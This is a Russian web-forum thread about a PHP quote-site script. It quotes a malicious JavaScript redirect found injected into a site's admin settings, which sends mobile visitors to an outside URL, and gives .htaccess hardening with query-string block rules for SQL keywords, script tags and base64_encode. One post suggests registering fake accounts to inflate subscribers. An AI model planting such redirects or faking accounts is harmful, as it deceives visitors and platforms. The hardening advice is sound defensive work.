[Другое] Цитатник от jon4god (lsass.exe)

Ну вот ... и у меня что-то где-то прохудилось.
В админке перешел на страницу настроек (там, где описание сайта и правила) и обнаружил вот это:
PHP:
<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|windows phone)/i)!==null){
  window.location = "http://newupd.com/s/3201";
}
//-->
</script>
в обоих окошках.
Прошу подсказки как поступать?
 
Привет kreator Ну первое, что я всегда делаю с админками любых скриптов это закрываю доступ через .htaccess по IP адресу.

Т.Е

Order Deny,Allow
Deny from all
Allow from 111.111.111.111 - ip с которого разрешен вход, с остальных ip запрещен
Если ip динамический то можно задать диапазон все безопаснее будет.

!!! Это офигенный метод.
Это касаемо админок...
Для файлов настроек всяких нужно делать, чтобы мог обращаться только сам php сервис, а пользователям при прямом обращении была балалайка :)

Второй шаг - блокировка от школьнегов

#### block out some common exploits
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteCond %{QUERY_STRING} SELECT(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} UNION(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} UPDATE(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteRule ^([^.]*)/?$ index.php [L]

Еще можно если свой сервак или VDS поставить владельца типо root например... тогда файлы нельзя будет отредактировать.

Далее смотри скорее логи апача и смотри с каких ip обращались к админке кроме твоего.

Продырявить могут со всех сторон - например вообще через соседей (хотя я думаю что дырок в скрипте хватает и так), или например по ftp (я для таких случаев использую блокировку типо - запретить более одного подключения к ftp + записать в лог тех кто входил.).
Могли также залить шелл... или вообще модифицировать файлы - добавив "черных ход".
 
Ну и подхватив тему про 150 подписчиков на виджет - напрашивается вопрос?
Где их набрать? Какие действия делать, чтоб % подписавшихся был больше?
Если участь что виджет все-таки интересный.
За 0,5 года - 2 подписчика.
И где их лучше искать?
 
Спасибо большое за скрипт. Посмотрим, что за чудо.
 
kreator, думаю легче купить ;)
че-почем? где?
-----
Кстати, от нечо-делать прикрутил скрипт - автопостинг случайного совета на стену, группу или страницу Фкантакте.
Кому интересно - стучитесь - выложу.
<-------------- добавлено через 48 сек. -------------->
-------------------------
Блин ... сам как ни старался - больше 2 чел не подписал (((
 
kreator, ну не знаю - я бы купил если бы надо было. (не знаю где... в интернетах :D, люди ж чем тока не промышляют, форум-постинг, блого, комменто-постинг... думаю и подписчиков можно купить.).
А кстати... че стоит нарегать акков и с каждого подписаться.

На счет скрипта автопостинга - выкладывай конечно... думаю фишка стоящая.
 
Давненько тут ничего не менялось и на досуге к голосовалке за цитаты прикрутил проверку cookies:
Для тех кому надо:

Закачиваем к себе файл: jquery.cookies.js

В top.php крепим его:
HTML:
<script src="../jc/jquery.cookies.js" type="text/javascript"></script>
путь к файлу укажите свой

Там же в скрипте голосовалки после:
Код:
$("a.vote_up").click(function(){
    //get the id
    the_id = $(this).attr('id');
и после:
Код:
$("a.vote_down").click(function(){
    //get the id
    the_id = $(this).attr('id');

Ставим:
Код:
if ($.cookies.get("vote" + the_id)) alert ("Вы уже голосовали");
 
    else
    {

Перед:
Код:
});
 
    $("a.vote_down").click(function(){
Ставим:
Код:
}

И в конце скрипта перед:
Код:
});
});

Ставим:
Код:
}

В двух местах после:
Код:
$("span#vote_buttons"+the_id).remove();

Вставить:
Код:
$.cookies.set("vote" + the_id, 12345679, {hoursToLive: 168});
<-------------- добавлено через 57 сек. -------------->
Итого, при повторном голосовании будет выходит сообщение "Вы уже голосовали!"
 
Спасибо за скрипт .. Скажите в кодировки скрипт ? Редактирую в UTF_8 после редактирования скрипт выдает ошибку...
 
Vvks, а когда файл для редактирования открываете - можно глянуть в какой он кодировке.
У меня УТФ8, но не помню так и было или сам уже менял ... по-моему там и было утф.
 
Назад
Сверху